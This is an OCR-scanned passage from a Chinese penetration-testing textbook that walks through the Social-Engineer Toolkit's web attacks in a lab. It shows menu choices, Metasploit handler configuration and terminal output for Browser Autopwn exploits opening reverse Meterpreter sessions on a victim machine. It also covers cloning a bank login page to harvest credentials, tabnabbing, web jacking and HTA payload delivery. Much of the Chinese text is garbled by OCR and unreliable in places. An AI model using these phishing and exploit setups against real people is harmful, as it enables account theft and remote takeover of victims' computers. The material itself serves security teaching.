Return to Main Menu 
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19-19 “Metasploit Brower Exploit Method" Jt 1t 


这 个 功能 并 不 是 SET 独 目 完成 的 ， 而 是 和 强大 的 Metasploit 合 作 完 成 
HJ. Metasploit FES KEN vias AUE, firefox) HJ. 122353 
试 者 可 以 利用 这 些 Metasploit 中 的 渗透 模块 建立 一 个 网 站 ， 一 旦 有 用 户 
访问 这 个 网 站 ， 了 网 站 中 的 代码 孢 会 目 动 运行 ， 使 用 各 种 渗透 模块 对 用 户 
的 浏览 颖 进行 攻击 ， 如 果 用 户 使 用 的 是 含有 源 凋 的 浏 喉 右上 时 ， 网 站 束 可 
ERI FH ax ES 18] 22345 FH P? HI VERGIL 

同样 在 创建 这 个 网 站 的 时 候 ， 我 们 也 需要 使 用 一 个 常见 的 网 站 ， 这 
样 才 不 容易 引起 客户 的 怀疑 ， 这 里 面 SET 跟 之 前 一 样 提 供 了 3 个 选项 ， 
如 图 9-20 所 示 。 


Terminal o © o 
File Edit View Search Terminal Help 
8) HTA Attack Method 


99) Return to Main Menu 
22 


The first method will allow SET to import a list of pre-defined web 
applications that it can utilize within the attack. 


The second method will completely clone a website of your choosing 
and allow you to utilize the attack vectors within the completely 
same web application you were attempting to clone. 


The third method allows you to import your own website, note that you 
should only have an index.html when using the import website 
functionality. 


1) Web Templates 
2) Site Cloner 
3) Custom Import 


99) Return to Webattack Menu 


21] 





K9-20 ”选择 “web Templates" 


这 里 我 们 选择 第 一 个 选项 ， 使 用 系统 目 市 的 模板 ， 如 图 9-21 所 示 。 


Terminal o © o0 
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NAT/Port Forwarding can be used in the cases where your SET machine is 
not externally exposed and may be a different IP address than your reverse l 
istener. 
» Are you using NAT/Port Forwarding [yes|no]: no 
Enter the IP address of your interface IP or if your using an external IP, w 
at 


will be used for the connection back and to house the web server (your inter 
face address) 





> IP address or hostname for the reverse connection:192.168.169.130 


图 9-21 输入 要 回 连 的 IP 地 址 


这 里 如 果 我 们 没有 使 用 NAT 技 术 的 话 ， 仍 然 选择 no 妈 可 ， 然 后 输入 
用 来 控制 目标 计算 机 的 IP 地 址 ， 这 里 我 们 填写 的 Kali Linux 2 所 在 计算 机 
HJIP 73192.168.169.130. 


然后 SET 会 要 求 我 们 在 ic roo rome 我 们 这 里 选择 
Yahoo 来 作为 要 伪造 的 网 站 ， 如 图 9-22 所 示 。 其 实 这 个 网 站 在 国内 很 少 
有 人 访问 ， 我 们 这 里 只 是 做 个 演示 。 
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. Java Required 
. Google 

. Facebook 

. Twitter 

. Yahoo 


> Select a template:5] 





在 选择 完 要 使 用 的 页 面 之 后 ， 束 会 弹出 一 个 窗口 ， 要 求 你 来 选择 所 
需要 使 用 的 模块 ， 这 里 需要 注意 的 是 ， 这 些 渗透 模块 并 不 是 对 所 有 的 浏 
虹 上 禹 都 能 起 作用 的 。 比 如 说 图 9-23 中 的 第 4 个 MS14-12 Microsoft Internet 
Exploirer TextRange Use-After-Free 吏 只 能 对 下 浏览 希 起 作用 ， 而 且 如 果 
目标 主机 打上 了 对 应 的 补丁 的 话 ， 也 没有 作用 了 。 值 得 注意 的 是 ， 很 多 
用 户 并 没有 注意 升级 页 面 的 Hash 插件 ， 而 这 里 面 的 前 两 个 殉 是 针对 Flash 
的 ， 所 以 前 一 段 时 间 ， 火 狐 耳 接 干 脆 茶 止 了 旧版 flash 插 件 的 运行 。 


Terminal 00o 
File Edit View Search Terminal Help 


Enter the browser exploit you would like to use [8]: 


1) Adobe Flash Player ByteArray Use After Free (2015-07-06) 
2) Adobe Flash Player Nellymoser Audio Decoding Buffer Overflow (2015-96-23) 
3) Adobe Flash Player Drawing Fill Shader Memory Corruption (2015-05-12) 
4) MS14-012 Microsoft Internet Explorer TextRange Use-After-Free (2014-03-11) 
5) MS14-012 Microsoft Internet Explorer CMarkup Use-After-Free (2014-02-13) 
6) Internet Explorer CDisplayPointer Use-After-Free (10/13/2013) 
Micorosft Internet Explorer SetMouseCapture Use-After-Free (09/17/2013) 
Java Applet JMX Remote Code Execution (UPDATED 2013-01-19) 
Java Applet JMX Remote Code Execution (2013-01-10) 
MS13-009 Microsoft Internet Explorer SLayoutRun Use-AFter-Free (2013-02-13) 
Microsoft Internet Explorer CDwnBindInfo Object Use-After-Free (2012-12-27) 
12) Java 7 Applet Remote Code Execution (2012-08-26) 
13) Microsoft Internet Explorer execCommand Use-After-Free Vulnerability (2012-09-1 
4) 
14) Java AtomicReferenceArray Type Violation Vulnerability (2012-02-14) 


15) Java Applet Field Bytecode Verifier Cache Remote Code Execution (2012-06-06) 
16) MS12-037 Internet Explorer Same ID Property Deleted Object Handling Memory Corr 
uption (2012-06-12) 
17) Microsoft XML Core Services MSXML Uninitialized Memory Corruption (2012-06-12) 
Adobe Flash Player Object Type Confusion (2012-05-04) 
Adobe Flash Player MP4 "cprt" Overflow (2012-02-15) 
MS12-004 midiOutPlayNextPolyEvent Heap Overflow (2012-01-10) 





图 9-23 ”针对 浏览 器 的 渗透 模块 


可 征 很 多 时 候 ， 我 们 并 不 知 秆 用 户 的 浏 斋 右 羡 什么 ， 或 着 存在 什么 
漏洞 。 这 在 对 一 个 企业 进行 渗透 测试 的 时 候 尤 为 明显 ， 上 百 个 用 户 可 能 
HH EB CEDE S, LEE- ARESA, (Hii HJ 
一 个 选项 ，SET 把 它 放 在 了 最 后 一 位 ， 也 就 是 第 46 位 的 “Metasploit 
Browser Autopwn”， 如 图 9-24 所 示 。 这 个 模块 会 自动 使 用 所 有 的 渗透 模 
块 对 目标 进行 测试 ， 只 要 目标 浏览 奏 存 在 以 上 45 个 漏 铀 中 的 任何 一 个 ， 
束 可 以 将 其 渗透 。 
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45) FireFox 3.6.16 mChannel use after free vulnerability (2011-05-10) 
46) Metasploit Browser Autopwn (USE AT OWN RISK!) 


>46 


1) Windows Shell Reverse TCP 
d back to attacker 
2) Windows Reverse TCP Meterpreter 
send back to attacker 
3) Windows Reverse TCP VNC DLL 
ack to attacker 
4) Windows Shell Reverse TCP X64 


Inline 

5) Windows Meterpreter Reverse TCP X64 
64), Meterpreter 

6) Windows Meterpreter Egress Buster 
rt home via multiple ports 

7) Windows Meterpreter Reverse HTTPS 
L and use Meterpreter 

8) Windows Meterpreter Reverse DNS 
and use Reverse Meterpreter 

9) Download/Run your Own Executable 


>f 


Spawn a command shell on victim and sen 
Spawn a meterpreter shell on victim and 
Spawn a VNC server on victim and send b 
Windows X64 Command Shell, Reverse TCP 
Connect back to the attacker (Windows x 
Spawn a meterpreter shell and find a po 
Tunnel communication over HTTP using SS 
Use a hostname instead of an IP address 


Downloads an executable and runs it 





图 9-24 ”选择 “Metasploit Browser Autopwn"Jit iti 77 3X 


值得 注意 的 是 ， 我 们 选择 的 第 46 选 项 是 一 个 非常 危险 的 模块 。 接 下 
来 ， 我 们 要 在 里 面 选择 一 个 当 渗 透 成 功 之 后 需要 使 用 的 远程 控制 模块 。 
这 里 面 提 供 了 9 个 选择 ， 我 们 以 第 一 个 选项 为 例 ， 这 是 一 个 使 用 TCP 协 
议 的 反 回 控制 模块 ， 如 图 9-25 所 示 。 
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45) FireFox 3.6.16 mChannel use after free vulnerability (2011-05-10) 
46) Metasploit Browser Autopwn (USE AT OWN RISK!) 


>46 


1) Windows Shell Reverse TCP 
d back to attacker 

2) Windows Reverse TCP Meterpreter 

send back to attacker 

3) Windows Reverse TCP VNC DLL 
ack to attacker 

4) Windows Shell Reverse TCP X64 
Inline 

5) Windows Meterpreter Reverse TCP X64 
64), Meterpreter 

6) Windows Meterpreter Egress Buster 
rt home via multiple ports 

7) Windows Meterpreter Reverse HTTPS 
L and use Meterpreter 

8) Windows Meterpreter Reverse DNS 
and use Reverse Meterpreter 

9) Download/Run your Own Executable 


21] 


Spawn a command shell on victim and sen 
Spawn a meterpreter shell on victim and 
Spawn a VNC server on victim and send b 
Windows X64 Command Shell, Reverse TCP 


Connect back to the attacker (Windows x 


Spawn a meterpreter shell and find a po 


Tunnel communication over HTTP using SS 
Use a hostname instead of an IP address 


Downloads an executable and runs it 





Kl9-25 ”选择 要 使 用 的 payload 


boy ipd ei 的 端口 ， 这 里 默认 是 443 端 口 ， 直 接 按 回 车 键 即 
可 ， 然 后 系统 就 会 L6 Dien rid 并 打开 一 个 对 应 刚才 模 
块 的 handler， 如 图 9-26 所 示 。 


Terminal ooo 


File Edit View Search Terminal Help 

7) Windows Meterpreter Reverse HTTPS Tunnel communication over HTTP using SSS 
L and use Meterpreter 

8) Windows Meterpreter Reverse DNS Use a hostname instead of an IP address 
and use Reverse Meterpreter 

9) Download/Run your Own Executable Downloads an executable and runs it 





>1 
> Port to use for the reverse [443]: 


The site has been moved. SET Web Server is now listening.. 
Launching MSF Listener.. 
This may take a few to load MSF... 


图 9-26 ”系统 自动 启动 Metasploit 


当 你 看 到 如 图 9-27 所 示 的 界面 时 ， 表 明 这 个 滩 远 服务 磊 已 经 建 并 好 


Terminal o o o 

File Edit View Search Terminal Help 
LPORT => 443 
resource (/root/.set//meta config)» set URIPATH / 
URIPATH => / 
resource (/root/.set//meta config)» set SRVPORT 8080 
SRVPORT -» 8080 
resource (/root/.set//meta config)> set ExitOnSession false 
ExitOnSession => false 
resource (/root/.set//meta config)> exploit -j 

Auxiliary module running as background job 


Setup 


Starting exploit modules on host 192.168.169.130... 


msf auxiliary( e Starting exploit android/browser/webview addjava 
scriptinterface with payload android/meterpreter/reverse tcp 

Using URL: http://0.0.0.0:8080/IrHVntO 

Local IP: http://192.168.169.130:8080/IrHVnt0 

Server started. 

Starting exploit multi/browser/firefox proto crmfrequest with payload generic/she 
ll reverse tcp 

Using URL: http://0.0.0.0:8080/KsTpFeR 

Local IP: http://192.168.169.130:8080/KsTpFeR 

Server started. 





图 9-27 ”局 动 这 个 伪 志 的 服务 


从 现在 开始 ， 一 旦 有 浏览 器 访问 http://192.168.169.130 时 ， 就 会 受到 
HRSS kS HJ TÉ e 好 了 ， 这 里 我 们 在 另外 一 从 计算 机 上 打开 "o3 访问 
一 下 这 个 地 址 ， 如 图 9-28 所 示 。 


ZU DX 
Æ http://192.168.169.130/ 
X 收藏 夫 | 38 p eunt p) Anne y 
Æ Sign in to Yahoo "m ~O &h ~ 页 面 (P) RAS IR(O)- 9- 





图 9-28  TEH]U Us 3j] 338 HJ P9] gh 


在 目标 访问 这 个 地 址 的 时 候 ， 我 们 建立 好 的 伪造 的 网 站 融会 同日 标 
发 送 渗透 测试 模块 ， 现 在 切换 回 我 们 的 Kali Linux 2 服务 器 ， 查 看 这 个 过 
EI TENURE MNT NNUS: o8 M 如 图 9- 
29 所 示 。 


Terminal o o o 


File Edit View Search Terminal Help 


192.168.169.131 ie cgenericelement uaf - Requesting: /ZxdHJqJPvSF 

192.168.169.131 ie cgenericelement uaf - Target selected as: IE 8 on Windows 7 

192.168.169.131 ie cgenericelement uaf - Sending HTML... 

192.168.169.131 java jrel7 provider skeleton - handling request for /vIUfFqFUYf/ 

192.168.169.131 java jrel7 jmxbean - handling request for /nYtAHadPQtlb/ 

192.168.169.131 java rhino - Java Applet Rhino Script Engine Remote Code Executi 

request 

192.168.169.131 java verifier field access - 9ending Java Applet Field Bytecode 
erifier Cache Remote Code Execution 

192.168.169.131 java verifier fieLd access - Generated jar to drop (5126 bytes). 

Session ID 4 (192.168.169.130:7777 -> 192.168.169.131:49221) processing InitialAu 
oRunScript 'migrate -f' 

Meterpreter scripts are deprecated. Try post/windows/manage/migrate. 

Example: run post/windows/manage/migrate OPTION-value [...] 

Sendina stane (9057487 hvtes tn 192 168.160 131 

Meterpreter session 5 opened (192.168.169.130:3333 -» 192.168.169.131:49222) at i 
017-07-10 04:09:44 -0400 

5e55IOn 1U 5 (192.100.109. 130:3333 -> 192.108.109. 131:49222Z) processing InITIaLAU 
n Ms 'migrate -f' 
i Meterpreter scripts are deprecated. Try Paa E ne a Ales 

Example: run post/windows/manage/migrate OPTION-value [...] 

Current server process: iexplore.exe (2904) 

Spawning notepad .exe process to migrate to 

Migrating to 3728 

Successfully migrated to process 





图 9-29 已 经 打开 的 会 话 


好 了 ， 经 过 我 们 的 测试 ， 上 目标 主机 的 浏览 右上 和 存在 五 个 涯 洞 ， 我 们 
现在 已 经 在 目标 主机 上 建立 了 控制 会 话 ， 如 图 9-30 所 示 ， 而 且 SET 还 很 


人 性 化 地 将 进程 迁移 到 了 Iexplore 上 ， 它 的 功能 越 来 越 强 大 了 。 


Terminal o o o0 
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Current server process: iexplore.exe (2904) 
Spawning notepad.exe process to migrate to 
Migrating to 3728 

Successfully migrated to process 


msf auxiliary( ) > session 
Unknown command: session. 
sf auxiliary( ) > sessions -j 


Active sessions 


Information 


meterpreter java/windows Administrator @ WIN-N8GQG18FRTI 

.130:7777 -» 192.168.169.131:49210 (192.168.169.131) 

meterpreter java/windows Administrator @ WIN-N8GQG18FRTI 

.130:7777 -» 192.168.169.131:49211 (192.168.169.131) 

meterpreter java/windows Administrator @ WIN-N8GQG18FRTI 

.130:7777 -» 192.168.169.131:49220 (192.168.169.131) 

meterpreter java/windows Administrator @ WIN-N8GQG18FRTI 

130:7777 -» 192.168.169.131:49221 (192.168.169.131) 

meterpreter x86/windows  WIN-N8GQG18FRTIMAdministrator @ WIN-N8GQGl18FRTI 
8.169.130:3333 -» 192.168.169.131:49222 (192.168.169.131) 


msf auxiliary( ) > | 


图 9-30 已 经 建立 好 的 连接 
到 此 ， 我 们 对 目标 浏览 器 漏洞 的 渗透 测试 就 结束 了 。 





9.5 ”用户 名 和 密码 的 盗 取 


接 下 来 我 们 要 测试 目标 单位 的 用 户 是 否 会 严格 草 守 管理 协议 ， 他 们 
侍 对 来 历 不 明 的 地 址 做 好 了 充分 的 戒备 。 下 面 采 取 如 图 9-31 所 示 
“Credential Harvester Attack Method” 攻 击 方 式 。 


Terminal ooo0 
File Edit View Search Terminal Help 


) Java Applet Attack Method 
mT 


"TE 2 


) Credential Harvester Attack Method 


) Web Jacking Attack Method 
) Multi-Attack Web Method 

) Full Screen Attack Method 
) HTA Attack Method 


) Return to Main Menu 





[x|9-31 “Credential Harvester Attack Method" Ji it 


这 里 的 第 三 项 是 一 种 专门 用 来 盗 取 用 户 信息 的 工具 ， 如 图 9-32 所 
示 。 通 过 这 个 工具 可 以 迅速 地 克隆 出 一 个 网 址 ， 这 个 网 址 需要 登录 名 和 
密码 ， 用 户 在 输入 了 登录 名 和 密码 之 后 ， 隐 会 被 Kali 服 务 器 所 镭 取 。 


Terminal o o o 


File Edit View Search Terminal Help 

ate however when clicked a window pops up then is replaced with the malicious li 
nk. You can edit the link replacement settings in the set config if its too slow 
/fast. 


The Multi-Attack method will add a combination of attacks through the web attack 
menu. For example you can utilize the Java Applet, Metasploit Browser, Credenti 
al Harvester/Tabnabbing all at once to see which is successful. 


The HTA Attack method will allow you to clone a site and perform powershell inje 
ction through HTA files which can be used for Windows-based powershell exploitat 
ion through the browser. 


Java Applet Attack Method 
Metasploit Browser Exploit Method 
Credential Harvester Attack Method 
Tabnabbing Attack Method 

Web Jacking Attack Method 
Multi-Attack Web Method 

Full Screen Attack Method 

HTA Attack Method 


1) 
2) 
3) 
4) 
3) 
6) 
7) 
8) 


WD 
Ke] 


Return to Main Menu 


EE 





图 9-32 ”选择 “Credential Harvester Attack Method" 


接 下 来 ， 还 是 需要 我 们 选择 一 个 创建 伪造 网 站 的 方法 ， 这 里 展示 的 
还 是 遇见 ecd 如 图 9-33 所 示 。 


Terminal © © 0 
File Edit View Search Terminal Help 
8) HTA Attack Method 


99) Return to Main Menu 
>3 


The first method will allow SET to import a list of pre-defined web 
applications that it can utilize within the attack. 


The second method will completely clone a website of your choosing 
and allow you to utilize the attack vectors within the completely 
same web application you were attempting to clone. 


The third method allows you to import your own website, note that you 
should only have an index.html when using the import website 
functionality. 


1) Web Templates 
2) Site Cloner 
3) Custom Import 
99) Return to Webattack Menu 


a 


图 9-33 ”选择 创建 网 站 的 方式 


这 里 面 我 还 是 选择 第 2 个 ， 元 隆 一 个 已 有 的 网 站 ， 如 图 9-34 所 示 。 
然后 系统 会 捉 示 我 们 输入 一 个 用 来 接收 盘 取 到 的 用 户 名 和 密码 的 地 址 。 





Terminal o o o 
File Edit View Search Terminal Help 


applications that it can utilize within the attack. 


The second method will completely clone a website of your choosing 
and allow you to utilize the attack vectors within the completely 
same web application you were attempting to clone. 


The third method allows you to import your own website, note that you 
should only have an index.html when using the import website 
functionality. 


1) Web Templates 
2) Site Cloner 
3) Custom Import 


99) Return to Webattack Menu 
>2 


Credential harvester will allow you to utilize the clone capabilities within 
SET 


to harvest credentials or parameters from a website as well as place them in 
to a report 
This option is used for what IP the server will POST to. 
Ir you're using an external IP, use your external IP for this 
> IP address for the POST back in Harvester/Tabnabbing: 





图 9-34 ”选择 第 二 种 方式 
这 里 我 将 IP 设 置 为 本 机 的 地 址 ， 如 图 9-35 所 示 。 


Terminal ooo 
File Edit View Search Terminal Help 
> IP address for the POST back in Harvester/Tabnabbing:192.168.168.lg 


130 


SET supports both HTTP and HTTPS 
Example: http://www.thisisafakesite.com 
> Enter the url to clone:l 





9-35 ”输入 要 克隆 的 地 址 


之 后 系统 会 要 求 我 们 输入 一 个 用 来 元 隆 的 地 址 ， 这 里 我 以 一 个 IBM 
的 测试 网 站 作为 克隆 的 地 址 《这 里 出 于 法 律 和 上 谍 ) ， 如 图 9-36 所 示 。 


> Enter the url to clone:http://www.testfire.net/bank/login.aspx 





图 9-36 ”开始 克隆 网 站 
当 SET 中 出 现 如 图 9-37 所 示 的 界面 时 ， 表 示 我 们 已 经 成 功 地 启动 了 
服务 器 。 


Python OpenSSL wasn't detected or PEM file not found, note that SSL compatibilit 
y will be affected. 
Printing error: zipimporter() argument 1 must be string, not function 





图 9-37 ”启动 伪造 好 的 网 站 服务 器 
现在 我 们 从 另外 一 台 计 算 机 来 访问 这 个 伪造 的 服务 器 ， 如 图 9-38 所 


人 小 。 
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AltoroMutual > m 


PERSONAL SMALL BUSINESS 


Online Banking Login 


m ONLINE BANKING LOGIN 














PERSONAL 
* Deposit Product 
e Checking 
* Loan Products 
e Cards 
e Investments & Insurance 
e Other Services 





Username: 














Password: 
Login | 

SMALL BUSINESS 

e Deposit Products 

e Lending Services 

e Cards 

* Insurance 

e Retirement 

e Other Services 














INSIDE ALTORO MUTUAL 


e Locations 





Privacy Policy | Security Statement | © 2017 Altoro Mutual, Inc. 





图 9-38 ”访问 伪造 的 网 站 


注意 这 个 网 站 和 真实 登录 界面 是 一 醒 一 样 的 。 用 户 在 其 中 输入 用 户 
名 和 密码 之 后 单 击 登录 按钮 ， 如 图 9-39 所 示 。 


Online Banking Login 


Username: lihuafeng 


Password:  |+srsesess 


图 9-39 H5 HEIE Jn. 


我 们 返回 到 Kali 虚 拟 机 ， 如 图 9-40 所 示 。 


192.168.169.1 - - [10/Jul/2017 20:21:52] "GET / HTTP/1.1" 200 - 
192.168.169.1 - - [10/Jul/2017 20:24:04] "GET / HTTP/1.1" 200 - 





图 9-40 ”截获 到 的 信息 


注意 看 图 9-40 中 日 第 6 行 开始 “[*] WE GOT A HIT! Printing the 
output:” 之 后 的 部 分 ， 这 束 是 刚才 用 户 输 入 的 内 容 ， 需 要 注意 的 是 ， 这 
并 不 是 真 的 服务 费 ， 我 们 的 网 站 只 是 一 个 登录 界面 ， 是 不 可 能 让 用 户 真 
正 登 陆 上 去 的 。 但 是 我 们 经 党 有 过 这 种 经 历 ， 就 是 在 某 个 网 站 输入 了 用 
户 名 和 密码 之 后 ， 页 面 刷新 了 一 下 ， 然 后 我 们 又 得 再 次 输入 用 户 名 和 密 
伺 ， 这 时 候 我 们 通 种 会 认为 是 第 一 次 的 时 候 不 小 心 歌 错 了 哪个 字符 ， 等 
人 如 条 能 进入 到 网 站 中 ， 也 了 吏 不 会 再 理会 

SET 工具 包 利 用 了 我 们 的 这 个 心理 ， 所 以 当 用 户 第 一 次 输入 完 用 户 
名 和 密码 之 后 ， 在 用 户 的 浏览 器 天 会 进行 一 个 跳 转 ， 跳 苇 之 后 驶 会 到 真 
实 的 地 址 ， 如 图 9-41 所 示 。 





SMALL BUSINESS 


e Deposit Products 











图 9-41 ” 跳 转 到 真实 的 网 址 


如 琳 这 时 ， 用 户 和 输入 了 正确 的 用 户 名 和 密码 融 可 以 登录 到 系统 中 
了 ， 束 像 什么 部 没有 友 生 过 ，。 


以 上 几 种 是 比较 第 用 的 方法 ， 下 和 面 的 几 种 不 是 很 第 用 ， 而 且 想 法 也 


HESS. 


9.6 MA UL EX Jg 7] 2N 


我 们 接 关 来 查看 一 下 第 4 种 方法 ， 即 “Tabnabbing Attack Method". 
这 是 一 种 力 法 很 新 昨 的 攻击 方式 ， 即 当 受 害 背 在 使 用 浏览 器 时 航 上 面 的 
标签 欺骗 攻击 ， 如 图 9-42、 图 9-43 所 示 。 











OgIn.aspx 





Sign In | Contact Us | Fe 


AltoroMutual 5 


m ONLINE BANKING LOGIN PERSONAL SMALL BUSINESS 








PERSONAL Online Banking Login 
e Deposit Product 
e Checking 
* Loan Products Username: 
* Cards 
* Investments & Insurance 
e Other Services | Login 


Password: 


SMALL BUSINESS 


e Deposit Products 
e Lending Services 
e Cards 

e Insurance 

* Retirement 

e Other Services 





[9-42 *Tabnabbing Attack Method" Ji it 77 3X 


Terminal o o 0 


File Edit View Search Terminal Help 

ate however when clicked a window pops up then is replaced with the malicious li 
nk. You can edit the link replacement settings in the set config if its too slow 
/fast. 


The Multi-Attack method will add a combination of attacks through the web attack 
menu. For example you can utilize the Java Applet, Metasploit Browser, Credenti 
al Harvester/Tabnabbing all at once to see which is successful. 


The HTA Attack method will allow you to clone a site and perform powershell inje 
ction through HTA files which can be used for Windows-based powershell exploitat 
ion through the browser. 


Java Applet Attack Method 
Metasploit Browser Exploit Method 
Credential Harvester Attack Method 
Tabnabbing Attack Method 

Web Jacking Attack Method 
Multi-Attack Web Method 

Full Screen Attack Method 

HTA Attack Method 


1) 
2) 
3) 
4) 
5) 
6) 
7) 
8) 


MD 
MD 


Return to Main Menu 


ES 





图 9-43 ”在 命令 行 中 选中 “Tabnabbing Attack Method” 


同样 这 里 还 是 要 我 们 选择 一 种 网 站 的 设计 方式 。 这 里 我 们 选择 第 二 
种 方式 ， 元 隆 一 个 地 址 ， 如 图 9-44 所 示 。 


Terminal o o o0 
File Edit View Search Terminal Help 





图 9-44 ”选中 创建 网 站 的 方式 


为 简单 起 见 ， 我 们 仍然 以 http://wwwi.testfire.net/bank/login.aspx 为 例 
子 ， 如 图 9-45 所 示 。 


Terminal o o o0 
File Edit View Search Terminal Help 
» Enter the url to clone:http://www.testfire.net/bank/login.aspx 


Python OpenSSL wasn't detected or PEM file not found, note that SSL compatibilit 
y will be affected . 
Printing error: zipimporter() argument 1 must be string, not function 





图 9-45 ”输入 要 元 隆 的 网 站 地 址 


好 了 ， 现 在 我 们 使 用 另外 一 台 计 算 机 ， 打 开 这 个 地 址 
192.168.169.130， 然 后 但 看 网 页 的 内 容 ， 如 图 9-46 所 示 。 





y D 192.168.169.130 
€ œŒ [© 192.168.169.130 


Please wait while the site loads... 





图 9-46 ”打开 的 攻击 页 面 


这 时 出 现 的 是 一 个 请 等 每 的 外面， 其 实 如 末 你 不 进行 其 他 操作 的 
话 ， 这 个 页 面 永远 都 不 会 变 ， 如 末 各 户 希 得 这 个 页 面 很 重要 ， 不 会 关闭 
它 ， 但 是 也 不 想 束 这 样 一 二 等 待 下去， 他 可 能 融会 选择 打开 万 外 一 个 网 
站 ， 在 现在 的 浏 席 硕 中 都 提供 了 选项 卡 功能 ， 这 样 束 可 以 同时 打开 多 个 
网 站 ， 现 在 我 们 惑 答 试 去 打开 一 个 新 的 网 站 ， 如 图 9-47 所 示 。 


那么 用 户 可 能 会 打开 多 个 选项 卡 ， 这 时 很 有 可 能 友 生 的 是 ， 用 户 目 
己 也 不 清楚 目 己 打开 了 多 少 个 网 址 ， 而 我 们 之 前 提供 的 网 站 已 经 偷偷 地 
换 了 模样 ， 就 是 原来 的 网 站 那里 ， 你 仔细 地 观察 一 下 选项 卡 ， 此 时 的 选 
项 卡 已 经 变 成 了 如 图 9-48 这 个 样子 。 


用 户 如 果 经 常 浏览 这 个 网 站 的 话 ， 可 能 就 会 习惯 性 地 输入 用 户 名 和 
密码 ， 这 里 我 们 也 输入 一 个 用 户 名 和 密码 来 试 一 下 ， 如 图 9-49 所 示 。 





Online 日 3 [&] 百度 一 下 ,你 就 知道 X 
WT 









新 闻 hao123 





Bai 百度 


























图 9-48” 己 经 换 了 内 容 的 攻击 页 面 





/ D Altoro Mutual: Online B: X [&] 百度 一 下 ， 你 就 知道 








€ -> Œ [D 192.168.169.130/index2.html 


AltoroMutual > 


PERSONAL 


* Deposit Product 
Checking 
Loan Products 
Cards 


Other Services 


SMALL BUSINESS 
Deposit Products 
Lending Services 
Cards 
Insurance 
Retirement 





图 9-49 
这 时 我 们 返回 到 渗透 


六 一 样 捕获 到 了 用 户 的 信息 ， 


File Edit View Search Terminal 


- - [10/Jul/2017 
- - [10/Jul/2017 
- - [10/Jul/2017 
- - [10/Jul/2017 

- [10/Jul/2017 


- - [18/Jul/2017 
- [10/Jul/2017 


9-50 


e 同样 ， 在 输入 完 用 户 名 和 密码 之 后 ， 用 户 的 浏览 


m ONLINE BANKING LOGIN 


Investments & Insurance 


PERSONAL SMALL BUSINESS 


Online Banking Login 


Username: lihuafeng 


| Login | 


Password: 





INSIDE ALTORO MUTUAL 


在 这 个 攻击 页 面 中 输入 并 提交 用 户 名 和 密码 


秀 测 试用 的 Kali Linux 2 计算 机 中 ， 可 以 看 到 和 之 


如 图 9-50 所 示 。 
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的 网 站 ， 如 图 9-51 所 示 。 
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图 9-51 ”真实 的 网 站 


9.7 ”页 面 动 持 舱 骗 方 式 


接 下 来 我 们 来 看 看 “Web jacking Attack Method”， 如 图 9-52 上 所 示 。 
这 个 方法 的 操作 其 实 很 简单 ， 这 里 我 们 只 是 简单 地 进行 一 下 描述 。 











图 9-52 “Web jacking Attack Method” 攻 击 方式 


这 里 面 给 出 了 一 个 负面 跳 转 的 所 示 ， 这 是 我 们 平时 经 第 会 看 到 的 ， 
东 作 网 站 已 经 迁移 至 为 外 一 个 地 方 ， 如 下 我 们 这 时 操 击 了 页 面 上 给 出 的 
连接 ， 束 会 跳 转 到 如 图 9-53 所 示 的 页 面 。 
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[9-53 ”伪造 的 页 面 


看 起 来 好 像 和 真实 的 网 站 一 样 ， 但 是 仔细 看 束 会 友 现 地 址 并 不 相 
同 ， 如 打 用 户 在 这 个 页 面 中 输入 了 了 用户 名 和 和 密码 的 话 ， 跟 之 前 的 两 种 方 
法 一 样 ， 也 会 被 渗透 调试 者 所 获悉 。 


如 果 你 党 得 某 一 种 方法 不 够 充分 的 话 ， 可 以 选择 使 用 Multi-Attack 
Web Method， 这 个 方法 可 以 一 次 性 地 将 所 有 方式 都 用 上 。 


9.8 HTA 文件 攻击 欺骗 方式 


最 后 来 介绍 一 种 HIA Attack 方 法 ， 这 种 方法 和 第 一 种 Java Applet 其 
实 很 像 ， 如 图 9-54 所 示 。 


Terminal 0O09 
File Edit View Search Terminal Help 


99) Return to Main Menu 
>8 


The first method will allow SET to import a list of pre-defined web 
applications that it can utilize within the attack. 


The second method will completely clone a website of your choosing 
and allow you to utilize the attack vectors within the completely 
same web application you were attempting to clone. 


The third method allows you to import your own website, note that you 
should only have an index.html when using the import website 


functionality. 


1) Web Templates 
2) Site Cloner 
3) Custom Import 


99) Return to Webattack Menu 


: 22 
SEI supports both HTTP and HTTPS 
Fxamnle: httn://www.thisisafakesite. com 
» Enter the url to clone:http://www.testfire.net/bank/login.aspx 


WIA ACCUCA VCLCLUI 2JCLCLCLCU. LilLCI yuUul 46, TUI C, UNU Ii üytcudu.s.s: 


Enter the IP address for the reverse payload (LHOST): 192.168.169.30ğ 





图 9-54 ”选择 “HTA Attack” 攻 击 模 式 并 设置 要 克隆 的 地 址 


Wit 来 接收 控制 的 站 口 和 要 使 用 的 攻击 载 衙 等 ， 如 图 9- 
DƏ HIZR o 


SET supports both HTTP and HTTPS 
Fxamnle: httn://www.thisisafakesite.com 
- > Enter the url to clone:http://www.testfire.net/bank/login.aspx 
IIA MULLULT VELWwWI PIE uiv [1g d 了 JUI di ; TUIC} urru ruy tLVUVUU +. + 
Enter the IP address for the reverse payload (LHOST): 192.168.169.30 
Enter the port for the reverse payload [443]: 
Select the payload you want to deliver: 


1. Meterpreter Reverse HTTPS 
7 Maternreter Revercse HTTP 


3. Meterpreter Reverse TCP 


Enter the payload number | 





图 9-55 ”选择 要 使 用 Meterpreter 的 类型 


接 下 来 系统 会 日 动 局 动 Metasploit， 并 根据 我 们 之 前 的 设置 ， 建 六 


一 个 对 应 的 Handler， 如 图 9-56 所 示 。 
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486 payloads - 40 encoders - 9 nops 
Free Metasploit Pro trial: http://r-7.co/trymsp 


"ow w M 
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] 
1659 exploits - 950 auxiliary - 293 post ] 
] 
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Processing /root/.set//meta config for ERB directives. 
resource (/root/.set//meta config)» use multi/handler 
resource (/root/.set//meta config)» set payload windows/meterpreter/reverse tcp 
payload -» windows/meterpreter/reverse tcp 
resource (/root/.set//meta config)» set LHOST 192.168.169.30 


LHOST => 192.168.169.30 
resource (/root/.set//meta config)» set LPORT 443 
LPORT => 443 
resource (/root/.set//meta config)> set ExitOnSession false 
xitOnSession => false 
resource (/root/.set//meta_config)> set EnableStageEncoding true 
nableStageEncoding => true 
resource (/root/.set//meta_config)> exploit -j 
Exploit running as background job. 


Handler failed to bind to 192.168.169.30:443:- 
Started reverse TCP handler on 0.0.0.0:443 
Starting the payload handler... 

sf exploit( )^] 





图 9-56 ”建立 对 应 的 Handler 
